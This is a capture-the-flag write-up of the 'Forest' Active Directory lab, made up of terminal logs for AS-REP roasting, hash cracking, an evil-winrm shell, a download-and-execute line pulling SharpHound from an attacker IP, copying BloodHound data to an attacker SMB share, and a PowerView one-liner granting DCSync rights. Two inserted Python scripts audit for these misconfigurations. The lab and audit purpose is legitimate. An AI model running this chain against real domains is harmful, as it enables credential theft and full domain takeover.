Forest

1. Reconnaissance

1.1. nmap

┌──(root㉿kali)-[/home/kali/labs/forest/forest-2]
└─# nmap -sC -sV 10.129.48.153
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-29 16:10 +04
Nmap scan report for 10.129.48.153
Host is up (0.36s latency).
Not shown: 988 closed tcp ports (reset)
PORT     STATE SERVICE      VERSION
53/tcp   open  domain       Simple DNS Plus
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2025-12-29 12:18:55Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-12-29T12:19:17
|_  start_date: 2025-12-29T12:16:09
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2025-12-29T04:19:21-08:00
|_clock-skew: mean: 2h46m47s, deviation: 4h37m11s, median: 6m45s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 148.04 seconds
┌──(root㉿kali)-[/home/kali/labs/forest/forest-2]
└─# smbmap -H 10.129.48.153                      

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB                                                                                                  
[*] Established 1 SMB connections(s) and 0 authenticated session(s)                                                          
[!] Access denied on 10.129.48.153, no fun for you...                                                                        
[*] Closed 1 connections                                                                                                     
                                                                                                                                                                              
┌──(root㉿kali)-[/home/kali/labs/forest/forest-2]
└─# smbclient -N -L //10.129.48.153      
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.48.153 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌──(root㉿kali)-[/home/kali/labs/forest/forest-2]
└─# rpcclient -U ""%"" 10.129.48.153                     
rpcclient $> enudomusers
command not found: enudomusers
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
rpcclient $> ^C
┌──(root㉿kali)-[/home/kali/labs/forest/forest-2]
└─# impacket-GetNPUsers 'HTB.LOCAL/' -usersfile users -outputfile hash -dc-ip 10.129.48.153 
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$svc-alfresco@HTB.LOCAL:6a1f04a504b902b5a18ce54c15facbad$970c94ada6d9a3f7573224bd26f4bfb90bd66041269fb243079c87ace5cbf0589eed5b1a10ce9f621307e8bb93b2b976fe7c4d53e72393a5c73c970e04ca147fa8cbbb695460fbbf253f95895d3cd2cd7b02cd499fe50813f624cda64b3762db8f5f6f898f6ea62061becaddfe7a43ad07360564d9ba3329ff399f58e1f273ba3ac26f8be28754f5b17acf85e2d4acc0dff6afeece90abc9c65d55cd8f1b70eb5556f52630e11e80ed1a815c02e3f89db9af86590db04b9a78ba76e1e4f9f08738e67bd40fa3db3e59f2d52b0d391ea9054a194a3b5c9573990a73b8de349814d61c2bd5e818
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set
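The GetNPUsers run above shows what the KDC reveals about each account: most users "don't have UF_DONT_REQUIRE_PREAUTH set", disabled accounts come back as KDC_ERR_CLIENT_REVOKED, and the one enabled account that opts out of pre-authentication yields an AS-REP that can be cracked offline. The same condition can be audited from the directory side without touching Kerberos at all. The script below is an added example, not part of the original write-up: it decodes the userAccountControl attribute (the UF_* bit values are Microsoft's documented ADS_USER_FLAG constants) and separates enabled accounts that are exposed from disabled ones that the KDC would refuse anyway. The account records are constructed for illustration, not exported from the lab host.

```python
"""Audit userAccountControl for Kerberos pre-authentication opt-outs.

Added example (not part of the original write-up): an offline check over
records you would export from AD (sAMAccountName, userAccountControl).
The sample records at the bottom are constructed for illustration.
"""
from dataclasses import dataclass

# userAccountControl bit flags (values from Microsoft's ADS_USER_FLAG enum)
UF_ACCOUNTDISABLE = 0x0002
UF_NORMAL_ACCOUNT = 0x0200
UF_DONT_EXPIRE_PASSWD = 0x10000
UF_DONT_REQUIRE_PREAUTH = 0x400000

FLAG_NAMES = {
    UF_ACCOUNTDISABLE: "ACCOUNTDISABLE",
    UF_NORMAL_ACCOUNT: "NORMAL_ACCOUNT",
    UF_DONT_EXPIRE_PASSWD: "DONT_EXPIRE_PASSWD",
    UF_DONT_REQUIRE_PREAUTH: "DONT_REQUIRE_PREAUTH",
}


@dataclass
class Account:
    sam: str   # sAMAccountName
    uac: int   # userAccountControl


def decode_uac(uac: int) -> list[str]:
    """Return the names of the known flags set in a userAccountControl value."""
    return [name for bit, name in FLAG_NAMES.items() if uac & bit]


def audit_preauth(accounts: list[Account]) -> dict[str, list[str]]:
    """Split accounts that opt out of pre-authentication into 'exposed'
    (enabled, so an AS-REP can be requested for them) and 'dormant'
    (disabled, which the KDC rejects with KDC_ERR_CLIENT_REVOKED)."""
    exposed, dormant = [], []
    for a in accounts:
        if not a.uac & UF_DONT_REQUIRE_PREAUTH:
            continue
        (dormant if a.uac & UF_ACCOUNTDISABLE else exposed).append(a.sam)
    return {"exposed": sorted(exposed), "dormant": sorted(dormant)}


# Constructed sample: names echo the write-up, flag values are illustrative.
SAMPLE = [
    Account("sebastien", UF_NORMAL_ACCOUNT | UF_DONT_EXPIRE_PASSWD),
    Account("svc-alfresco",
            UF_NORMAL_ACCOUNT | UF_DONT_EXPIRE_PASSWD | UF_DONT_REQUIRE_PREAUTH),
    Account("old-svc",
            UF_NORMAL_ACCOUNT | UF_ACCOUNTDISABLE | UF_DONT_REQUIRE_PREAUTH),
]

if __name__ == "__main__":
    for bucket, names in audit_preauth(SAMPLE).items():
        print(f"{bucket}: {', '.join(names) or '-'}")
    for a in SAMPLE:
        print(f"{a.sam}: {hex(a.uac)} -> {', '.join(decode_uac(a.uac))}")
```

Feeding this real data only needs the two attributes from an LDAP export; anything listed under "exposed" is the set of accounts GetNPUsers would return a hash for, which makes it the list to remediate (clear the flag, or rotate to a long random password if the opt-out is required by a legacy client).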
                                                                                                                                                                              
┌──(root㉿kali)-[/home/kali/labs/forest/forest-2]
└─# cat hash      
$krb5asrep$23$svc-alfresco@HTB.LOCAL:6a1f04a504b902b5a18ce54c15facbad$970c94ada6d9a3f7573224bd26f4bfb90bd66041269fb243079c87ace5cbf0589eed5b1a10ce9f621307e8bb93b2b976fe7c4d53e72393a5c73c970e04ca147fa8cbbb695460fbbf253f95895d3cd2cd7b02cd499fe50813f624cda64b3762db8f5f6f898f6ea62061becaddfe7a43ad07360564d9ba3329ff399f58e1f273ba3ac26f8be28754f5b17acf85e2d4acc0dff6afeece90abc9c65d55cd8f1b70eb5556f52630e11e80ed1a815c02e3f89db9af86590db04b9a78ba76e1e4f9f08738e67bd40fa3db3e59f2d52b0d391ea9054a194a3b5c9573990a73b8de349814d61c2bd5e818
┌──(root㉿kali)-[/home/kali/labs/forest/forest-2]
└─# hashcat -m 18200 hash /usr/share/wordlists/rockyou.txt 
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu--0x000, 2909/5883 MB (1024 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

[...SNIP...]

$krb5asrep$23$svc-alfresco@HTB.LOCAL:6a1f04a504b902b5a18ce54c15facbad$970c94ada6d9a3f7573224bd26f4bfb90bd66041269fb243079c87ace5cbf0589eed5b1a10ce9f621307e8bb93b2b976fe7c4d53e72393a5c73c970e04ca147fa8cbbb695460fbbf253f95895d3cd2cd7b02cd499fe50813f624cda64b3762db8f5f6f898f6ea62061becaddfe7a43ad07360564d9ba3329ff399f58e1f273ba3ac26f8be28754f5b17acf85e2d4acc0dff6afeece90abc9c65d55cd8f1b70eb5556f52630e11e80ed1a815c02e3f89db9af86590db04b9a78ba76e1e4f9f08738e67bd40fa3db3e59f2d52b0d391ea9054a194a3b5c9573990a73b8de349814d61c2bd5e818:s3rvice

[...SNIP...]
┌──(root㉿kali)-[/home/kali/labs/forest/forest-2]
└─# nxc smb 10.129.48.153 -u svc-alfresco -p s3rvice --shares             
SMB         10.129.48.153   445    FOREST           [*] Windows 10 / Server 2016 Build 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True) 
SMB         10.129.48.153   445    FOREST           [+] htb.local\svc-alfresco:s3rvice 
SMB         10.129.48.153   445    FOREST           [*] Enumerated shares
SMB         10.129.48.153   445    FOREST           Share           Permissions     Remark
SMB         10.129.48.153   445    FOREST           -----           -----------     ------
SMB         10.129.48.153   445    FOREST           ADMIN$                          Remote Admin
SMB         10.129.48.153   445    FOREST           C$                              Default share
SMB         10.129.48.153   445    FOREST           IPC$            READ            Remote IPC
SMB         10.129.48.153   445    FOREST           NETLOGON        READ            Logon server share 
SMB         10.129.48.153   445    FOREST           SYSVOL          READ            Logon server share 


┌──(root㉿kali)-[/home/kali/labs/forest/forest-2]
└─# nxc smb 10.129.48.153 -u svc-alfresco -p s3rvice --users 
SMB         10.129.48.153   445    FOREST           [*] Windows 10 / Server 2016 Build 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:False) 
SMB         10.129.48.153   445    FOREST           [+] htb.local\svc-alfresco:s3rvice 
SMB         10.129.48.153   445    FOREST           -Username-                    -Last PW Set-       -BadPW- -Description-                                               
SMB         10.129.48.153   445    FOREST           Administrator                 2021-08-31 00:51:58 0       Built-in account for administering the computer/domain 
SMB         10.129.48.153   445    FOREST           Guest                         <never>             0       Built-in account for guest access to the computer/domain 
SMB         10.129.48.153   445    FOREST           krbtgt                        2019-09-18 10:53:23 0       Key Distribution Center Service Account 
[...SNIP...]
SMB         10.129.48.153   445    FOREST           sebastien                     2019-09-20 00:29:59 0        
SMB         10.129.48.153   445    FOREST           lucinda                       2019-09-20 00:44:13 0        
SMB         10.129.48.153   445    FOREST           svc-alfresco                  2025-12-29 12:30:39 0        
SMB         10.129.48.153   445    FOREST           andy                          2019-09-22 22:44:16 0        
SMB         10.129.48.153   445    FOREST           mark                          2019-09-20 22:57:30 0        
SMB         10.129.48.153   445    FOREST           santi                         2019-09-20 23:02:55 0        
SMB         10.129.48.153   445    FOREST           [*] Enumerated 31 local users: HTB


┌──(root㉿kali)-[/home/kali/labs/forest/forest-2]
└─# nxc winrm 10.129.48.153 -u svc-alfresco -p s3rvice                         
WINRM       10.129.48.153   5985   FOREST           [*] Windows 10 / Server 2016 Build 14393 (name:FOREST) (domain:htb.local)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.129.48.153   5985   FOREST           [+] htb.local\svc-alfresco:s3rvice (Pwn3d!)
                                                                                                                                                                              
┌──(root㉿kali)-[/home/kali/labs/forest/forest-2]
└─# evil-winrm -i 10.129.48.153 -u svc-alfresco -p s3rvice                           
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> type ..\Desktop\user.txt
┌──(root㉿kali)-[/home/kali/labs/forest]
└─# locate SharpHound.ps1
/usr/share/metasploit-framework/data/post/powershell/SharpHound.ps1
/usr/share/powershell-empire/empire/server/data/module_source/situational_awareness/network/SharpHound.ps1
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> iex(new-object net.webclient).downloadstring("http://10.10.14.143/SharpHound.ps1")
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> invoke-bloodhound -collectionmethod all -domain htb.local -ldapuser svc-alfresco -ldappass s3rvice
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> dir


    Directory: C:\Users\svc-alfresco\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        12/9/2025  11:19 PM          18734 20251209231944_BloodHound.zip
-a----       12/10/2025   3:51 AM          18831 20251210035124_BloodHound.zip
-a----       12/10/2025   3:51 AM          19745 MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin
-ar---        12/9/2025   9:04 PM             34 user.txt
┌──(root㉿kali)-[/home/kali/labs/forest]
└─# impacket-smbserver share . -smb2support -username asdf -password asdf                                                
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> net use \\10.10.14.143\share /u:asdf asdf
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> copy 20251210035124_BloodHound.zip \\10.10.14.143\share\
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> del 20251210035124_BloodHound.zip
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> net use /d \\10.10.14.143\share
\\10.10.14.143\share was deleted successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> upload PowerView.ps1
                                        
Info: Uploading /home/kali/labs/forest/PowerView.ps1 to C:\Users\svc-alfresco\Documents\PowerView.ps1
                                        
Data: 1027036 bytes of 1027036 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> . .\PowerView.ps1
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Add-DomainGroupMember -Identity 'Exchange Windows Permissions' -Members svc-alfresco; $username = "htb\svc-alfresco"; $password = "s3rvice"; $secstr = New-Object -TypeName System.Security.SecureString; $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)}; $cred = new-object -typename System.Management.Automation.PSCredential -argumentlist $username, $secstr; Add-DomainObjectAcl -Credential $Cred -PrincipalIdentity 'svc-alfresco' -TargetIdentity 'HTB.LOCAL\Domain Admins' -Rights DCSync
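The final one-liner above works because membership in 'Exchange Windows Permissions' carries WriteDacl on the domain object, which is then used to grant svc-alfresco the two replication control-access rights that DCSync needs. Both the precondition (a non-administrative group holding WriteDacl on the domain) and the result (a plain user holding DS-Replication-Get-Changes and DS-Replication-Get-Changes-All) are visible in the domain object's DACL. The script below is an added example, not part of the original write-up: it parses a security descriptor in SDDL string form and reports every principal outside an allowlist that holds WriteDacl, WriteOwner, GenericAll or the replication rights. The SDDL, SIDs and the SID-to-name map are constructed to mirror the state of the lab after the command above; the replication right GUIDs and the SDDL access-mask values are the documented AD constants.

```python
"""Offline audit of a domain object's DACL for DCSync-capable and
DACL-modifying grants.

Added example (not part of the original write-up). It reads the SDDL string
form of a security descriptor (as exported with ldapsearch, Get-Acl or
similar) and reports principals outside an allowlist that hold WriteDacl,
WriteOwner, GenericAll, or the replication control-access rights that
DCSync relies on. All sample data below is constructed.
"""
import re

# Control-access right GUIDs for directory replication (AD schema constants)
REPL_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "": "All-Extended-Rights",   # empty object GUID = every control-access right
}

# SDDL two-letter rights and the access-mask bits they stand for
RIGHT_BITS = {"WD": 0x40000, "WO": 0x80000, "GA": 0x10000000, "CR": 0x100}
RIGHT_NAMES = {0x40000: "WriteDacl", 0x80000: "WriteOwner", 0x10000000: "GenericAll"}

DACL_RE = re.compile(r"D:[A-Z]*((?:\([^)]*\))+)")   # DACL flags, then the ACE list
ACE_RE = re.compile(r"\(([^)]*)\)")


def access_mask(rights: str) -> int:
    """Convert an SDDL rights field (two-letter codes or 0x hex) to a mask."""
    if rights.lower().startswith("0x"):
        return int(rights, 16)
    mask = 0
    for i in range(0, len(rights), 2):
        mask |= RIGHT_BITS.get(rights[i:i + 2], 0)   # unknown codes are not risky here
    return mask


def parse_aces(sddl: str) -> list[dict]:
    """Return the DACL ACEs of an SDDL string as dicts (owner/group/SACL ignored)."""
    m = DACL_RE.search(sddl)
    aces = []
    for body in ACE_RE.findall(m.group(1) if m else ""):
        fields = body.split(";")
        if len(fields) != 6:
            continue   # conditional or malformed ACE: skip rather than guess
        ace_type, _flags, rights, obj_guid, _inh_guid, sid = fields
        aces.append({"type": ace_type, "mask": access_mask(rights),
                     "guid": obj_guid.lower(), "sid": sid})
    return aces


def audit_domain_dacl(sddl: str, sid_names: dict, allowlist: set) -> list[tuple]:
    """Return sorted (principal, right) pairs for risky allow ACEs held by
    principals not on the allowlist. Deny ACEs are not considered."""
    findings = set()
    for ace in parse_aces(sddl):
        if ace["type"] not in ("A", "OA"):
            continue
        who = sid_names.get(ace["sid"], ace["sid"])
        if who in allowlist:
            continue
        for bit, name in RIGHT_NAMES.items():
            if ace["mask"] & bit:
                findings.add((who, name))
        if ace["mask"] & RIGHT_BITS["CR"] and ace["guid"] in REPL_GUIDS:
            findings.add((who, REPL_GUIDS[ace["guid"]]))
    return sorted(findings)


# Constructed sample: a fictional domain SID, names chosen to mirror the lab.
DOMAIN = "S-1-5-21-100-200-300"
SID_NAMES = {
    f"{DOMAIN}-512": "Domain Admins",
    f"{DOMAIN}-516": "Domain Controllers",
    f"{DOMAIN}-513": "Domain Users",
    f"{DOMAIN}-1105": "Exchange Windows Permissions",
    f"{DOMAIN}-1106": "svc-alfresco",
}
ALLOWLIST = {"Domain Admins", "Domain Controllers"}
SAMPLE_SDDL = (
    f"O:{DOMAIN}-512G:{DOMAIN}-512D:"
    f"(A;;CCDCLCSWRPWPLOCRRCWDWO;;;{DOMAIN}-512)"
    f"(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;{DOMAIN}-516)"
    f"(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;{DOMAIN}-516)"
    f"(A;;RPLCRC;;;{DOMAIN}-513)"
    f"(A;;WD;;;{DOMAIN}-1105)"
    f"(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;{DOMAIN}-1106)"
    f"(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;{DOMAIN}-1106)"
)

if __name__ == "__main__":
    for who, right in audit_domain_dacl(SAMPLE_SDDL, SID_NAMES, ALLOWLIST):
        print(f"{who}: {right}")
```

Run against the sample it reports the WriteDacl held by the Exchange group (the condition that exists before anyone logs in) and the two replication rights on svc-alfresco (the condition created by the command above); on a real export the allowlist should hold only the principals that legitimately replicate, and anything else in the output is either a misconfiguration to remove or an indicator that an ACL change like this one has already happened.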